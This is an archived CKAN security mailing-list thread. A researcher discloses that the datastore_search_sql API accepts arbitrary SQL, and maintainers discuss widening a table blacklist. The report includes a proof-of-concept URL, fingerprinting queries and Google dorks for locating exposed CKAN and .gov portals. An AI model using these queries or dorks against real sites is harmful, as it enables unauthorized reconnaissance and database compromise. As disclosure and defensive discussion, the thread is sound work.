[CKAN-Security] Fwd: security vulnerability in CKAN
Ian Ward
ian at excess.org
Fri Jul 3 15:18:41 UTC 2015
Let's add Michael's list of tables to the ones we're blacklisting
(currently just pg_* IIUC).
Also, should there be a t.lower() here?:
https://github.com/ckan/ckan/blob/master/ckanext/datastore/db.py#L1221
On Mon, Mar 2, 2015 at 5:28 AM, Adrià Mercader <adria.mercader at okfn.org> wrote:
> Thanks Michael,
>
> We'll discuss the issue and come back to you.
>
> Adrià
>
> On 2 March 2015 at 08:18, Matt Moore <matt.moore at okfn.org> wrote:
>>
>> ---------- Forwarded message ----------
>> From: dophine britanico <dophine at gmail.com>
>> Date: 2 March 2015 at 07:48
>> Subject: Re: security vulnerability in CKAN
>> To: Matt Moore <matt.moore at okfn.org>
>>
>>
>> Hi,
>>
>> Thank you I believe in responsible security disclosure so I contacted you
>> here is what i found while auditing our CKAN server.
>>
>> vulnerability: CKAN API
>>
>> URL: http://demo.ckan.org/api/action/datastore_search_sql
>> SQL injection points: ?sql=INJECT HERE
>>
>> To replicate:
>> Install JSON View plugin for firefox or chrome
>>
>> POC:
>> http://demo.ckan.org/api/action/datastore_search_sql?sql=SELECT%20inet_server_addr%28%29;
>>
>> Sample: SQL
>> SELECT current_database()
>> SELECT current_user;
>> SELECT inet_server_addr();
>> SELECT version()
>>
>> Vulnerable URL will returned sensitive information, Persistent attacker will
>> use and escalate this to a total server compromise.
>>
>> Google dork:
>> inurl:datastore_search_sql
>>
>> This can be also directly fingerprinted and replicated to any website using
>> CKAN.
>>
>> Vulnerable as well is US data portal www.data.gov, in which I have also
>> contacted them in case respond from yours is delayed
>>
>> site:.gov datastore_search_sql
>>
>> Suggested Fix:
>> Sanitize or remove 'sql' input paramater from datastore_search_sql
>> Remove api_info.html?resource_id sample query sample from default install
>>
>>
>> Sincerely,
>> Michael Britanico
>>
>>
>>
>>
>>
>>
>>
>>
>> On Mon, Mar 2, 2015 at 3:27 PM, Matt Moore <matt.moore at okfn.org> wrote:
>>>
>>> Dophine,
>>>
>>> If you could provide us with some information, then we can look into the
>>> vulnerability. I've mentioned this to our development team, but without
>>> some information, there's not much we can do.
>>>
>>> Thanks,
>>>
>>> Matthew Moore
>>>
>>> On 2 March 2015 at 06:13, dophine britanico <dophine at gmail.com> wrote:
>>>>
>>>> Hello,
>>>>
>>>> I would like to inform you of a remote and serious vulnerability in the
>>>> default and recent version of CKAN and probably all recent versions of CKAN.
>>>>
>>>> Please contact me anytime.
>>>>
>>>> Dophine "Michael" Britanico
>>>> Security Researcher
>>>> (+63) 9151100672
>>>>
>>>
>>>
>>>
>>> --
>>> Matthew Moore
>>> Sysadmin
>>> Open Knowledge - www.okfn.org
>>> Skype - notmatt
>>
>>
>>
>>
>>
>> --
>> Matthew Moore
>> Sysadmin
>> Open Knowledge - www.okfn.org
>> Skype - notmatt
>>
>> _______________________________________________
>> CKAN security
>> https://lists.okfn.org/mailman/listinfo/security
>> https://lists.okfn.org/mailman/options/security/adria.mercader%40okfn.org
>>
>> Repo: https://github.com/ckan/ckan-security
> _______________________________________________
> CKAN security
> https://lists.okfn.org/mailman/listinfo/security
> https://lists.okfn.org/mailman/options/security/ian%40excess.org
>
> Repo: https://github.com/ckan/ckan-security
More information about the Security
mailing list